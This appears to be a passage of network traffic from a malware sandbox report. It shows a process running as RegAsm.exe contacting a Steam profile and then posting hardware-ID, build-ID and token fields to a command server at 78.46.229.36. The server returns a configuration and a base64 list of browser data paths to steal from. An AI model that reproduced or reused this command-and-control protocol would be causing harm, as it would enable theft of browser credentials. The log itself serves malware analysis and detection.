2024-03-28 08:16:11 UTC	654	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:16:11 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC47DED9:F96E_93878F2E:0050_6605274B_5AEEC01:7B63 x-iplb-instance: 59128 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOw7jBEXj3HlD9VY2wqEw3TZ7jkQV6Uz9NBlO8JDmVyLFK%2BQ7u4cq7NVQyb8%2BQgC%2Fn930gOfVNKlJvr79YGbryGxQSOqew6shEXEDcDAkNqEXN8HNC1PQBKdfA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62d358ea41ff4-IAD alt-svc: h3=":443"; ma=86400
2024-03-28 08:16:11 UTC	707	IN	Data Raw: 32 62 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 69 70 41 64 64 72 65 73 73 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 73 45 75 4d 65 6d 62 65 72 22 3a 66 61 6c 73 65 2c 22 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 63 75 72 72 65 6e 63 79 4e 61 6d 65 22 3a 22 44 6f 6c 6c 61 72 22 2c 22 70 68 6f 6e 65 50 72 65 66 69 78 22 3a 22 31 22 2c 22 6c 61 6e 67 75 61 67 65 73 22 Data Ascii: 2bc{"status":"ok","demoInfo":{"ipAddress":"102.165.48.43","continentCode":"NA","continentName":"North America","countryCode":"US","countryName":"United States","isEuMember":false,"currencyCode":"USD","currencyName":"Dollar","phonePrefix":"1","languages"
2024-03-28 08:16:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	49884	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:28 UTC	238	OUT	GET /widget/demo/102.165.48.43 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: ipinfo.io
2024-03-28 08:16:29 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 28 Mar 2024 08:16:29 GMT content-type: application/json; charset=utf-8 Content-Length: 1021 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-03-28 08:16:29 UTC	738	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 2c 20 44 2e 43 2e 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 38 2e 38 39 35 31 2c 2d 37 37 2e 30 33 36 34 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 32 30 30 30 34 22 2c 0a 20 20 20 20 22 74 69 6d 65 Data Ascii: { "input": "102.165.48.43", "data": { "ip": "102.165.48.43", "city": "Washington", "region": "Washington, D.C.", "country": "US", "loc": "38.8951,-77.0364", "org": "AS174 Cogent Communications", "postal": "20004", "time
2024-03-28 08:16:29 UTC	283	IN	Data Raw: 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 47 72 6f 75 6e 64 20 46 6c 6f 6f 72 2c 20 34 20 56 69 63 74 6f 72 69 61 20 53 71 75 61 72 65 2c 20 53 74 20 41 6c 62 61 6e 73 2c 20 48 65 72 74 66 6f 72 64 73 68 69 72 65 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 47 42 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 69 70 78 6f 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 45 64 76 69 6e 61 73 20 52 61 63 6b 61 75 73 6b 61 73 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 31 30 32 2e 31 36 35 2e 30 2e 30 2f 31 38 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 74 65 6c 3a 2b Data Ascii: ": { "address": "Ground Floor, 4 Victoria Square, St Albans, Hertfordshire, London, United Kingdom", "country": "GB", "email": "abuse@ipxo.com", "name": "Edvinas Rackauskas", "network": "102.165.0.0/18", "phone": "tel:+

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	49885	104.26.4.15	443

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:29 UTC	262	OUT	GET /demo/home.php?s=102.165.48.43 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: db-ip.com
2024-03-28 08:16:29 UTC	668	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:16:29 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC462796:5A0E_93878F2E:0050_6605275D_5AEEED0:7B63 x-iplb-instance: 59128 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5G5z%2FVlAw66PQtd%2B%2FXkmqhuVIVpZsu%2F5NwCOX6wNYcOUVYISx46%2Fmo9RKI%2B0DgN%2Br%2B%2BJUkKCD3azwnKRftgTultDGJhCIO9PP8oLQd7lOAB7wNb%2Fmc8SysDpbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62da92ef739b2-IAD alt-svc: h3=":443"; ma=86400
2024-03-28 08:16:29 UTC	701	IN	Data Raw: 32 62 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 69 70 41 64 64 72 65 73 73 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 73 45 75 4d 65 6d 62 65 72 22 3a 66 61 6c 73 65 2c 22 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 63 75 72 72 65 6e 63 79 4e 61 6d 65 22 3a 22 44 6f 6c 6c 61 72 22 2c 22 70 68 6f 6e 65 50 72 65 66 69 78 22 3a 22 31 22 2c 22 6c 61 6e 67 75 61 67 65 73 22 Data Ascii: 2bc{"status":"ok","demoInfo":{"ipAddress":"102.165.48.43","continentCode":"NA","continentName":"North America","countryCode":"US","countryName":"United States","isEuMember":false,"currencyCode":"USD","currencyName":"Dollar","phonePrefix":"1","languages"
2024-03-28 08:16:29 UTC	6	IN	Data Raw: 77 22 7d 7d 0d 0a Data Ascii: w"}}
2024-03-28 08:16:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49886	104.104.85.160	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:31 UTC	119	OUT	GET /profiles/76561199658817715 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:31 UTC	1882	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 28 Mar 2024 08:16:31 GMT Content-Length: 34657 Connection: close Set-Cookie: sessionid=4450a10e1b40ad1ddf74a1bc; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C4501bef07644d0152615a97beef5c423; Path=/; Secure; HttpOnly; SameSite=None
2024-03-28 08:16:31 UTC	14502	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-03-28 08:16:32 UTC	10074	IN	Data Raw: 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 63 63 6f 75 6e 74 20 4d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 69 6e 73 74 61 6c 6c 73 74 65 61 6d 5f 62 74 6e 20 68 65 61 64 65 72 5f 69 6e 73 74 61 Data Ascii: '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Menu"><a class="header_installsteam_btn header_insta
2024-03-28 08:16:32 UTC	10081	IN	Data Raw: 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 70 75 62 6c 69 63 5c 2f 73 68 61 72 65 64 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 48 41 54 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 Data Ascii: :\/\/store.cloudflare.steamstatic.com\/","PUBLIC_SHARED_URL":"https:\/\/community.cloudflare.steamstatic.com\/public\/shared\/","COMMUNITY_BASE_URL":"https:\/\/steamcommunity.com\/","CHAT_BASE_URL":&q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49888	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:33 UTC	218	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49890	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:34 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:34 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 38 38 30 30 32 35 30 43 35 33 35 32 38 30 30 33 31 39 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="hwid"18E8800250C53528003197-a33c7340-61ca-11ee-8c18-806e6f6e6963------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------
2024-03-28 08:16:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:35 UTC	67	IN	Data Raw: 33 38 0d 0a 31 7c 31 7c 31 7c 30 7c 38 37 62 32 63 64 35 32 61 38 38 63 38 62 31 35 32 31 37 35 34 34 33 34 66 34 63 61 31 63 37 61 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 381\|1\|1\|0\|87b2cd52a88c8b1521754434f4ca1c7a\|1\|1\|1\|0\|0\|500000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49892	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:35 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:35 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 62 32 63 64 35 32 61 38 38 63 38 62 31 35 32 31 37 35 34 34 33 34 66 34 63 61 31 63 37 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="token"87b2cd52a88c8b1521754434f4ca1c7a------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------CFBFCGIDAKECGCBGDBAFCont
2024-03-28 08:16:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:36 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	49893	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:35 UTC	238	OUT	GET /widget/demo/102.165.48.43 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: ipinfo.io
2024-03-28 08:16:36 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 28 Mar 2024 08:16:36 GMT content-type: application/json; charset=utf-8 Content-Length: 1021 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-03-28 08:16:36 UTC	738	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 2c 20 44 2e 43 2e 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 38 2e 38 39 35 31 2c 2d 37 37 2e 30 33 36 34 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 32 30 30 30 34 22 2c 0a 20 20 20 20 22 74 69 6d 65 Data Ascii: { "input": "102.165.48.43", "data": { "ip": "102.165.48.43", "city": "Washington", "region": "Washington, D.C.", "country": "US", "loc": "38.8951,-77.0364", "org": "AS174 Cogent Communications", "postal": "20004", "time
2024-03-28 08:16:36 UTC	283	IN	Data Raw: 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 47 72 6f 75 6e 64 20 46 6c 6f 6f 72 2c 20 34 20 56 69 63 74 6f 72 69 61 20 53 71 75 61 72 65 2c 20 53 74 20 41 6c 62 61 6e 73 2c 20 48 65 72 74 66 6f 72 64 73 68 69 72 65 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 47 42 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 69 70 78 6f 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 45 64 76 69 6e 61 73 20 52 61 63 6b 61 75 73 6b 61 73 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 31 30 32 2e 31 36 35 2e 30 2e 30 2f 31 38 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 74 65 6c 3a 2b Data Ascii: ": { "address": "Ground Floor, 4 Victoria Square, St Albans, Hertfordshire, London, United Kingdom", "country": "GB", "email": "abuse@ipxo.com", "name": "Edvinas Rackauskas", "network": "102.165.0.0/18", "phone": "tel:+

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	49896	104.26.4.15	443

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:36 UTC	262	OUT	GET /demo/home.php?s=102.165.48.43 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: db-ip.com
2024-03-28 08:16:36 UTC	652	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:16:36 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC47DEAA:4E18_93878F2E:0050_66052764_5AEEF64:7B63 x-iplb-instance: 59128 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9dhQN5d6lmmuQN1%2ByY322ta6MBNgj7tqay8ocWpCaeSB7nYrEcj7OsgTM45Hkw9RzUmMJ4kCtJHFrKX6bJ4FccorELLiVRSvhu5qDWcjJTt%2BJBEu0qH4HZRrkA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62dd49bd220d5-IAD alt-svc: h3=":443"; ma=86400
2024-03-28 08:16:36 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-03-28 08:16:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49897	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
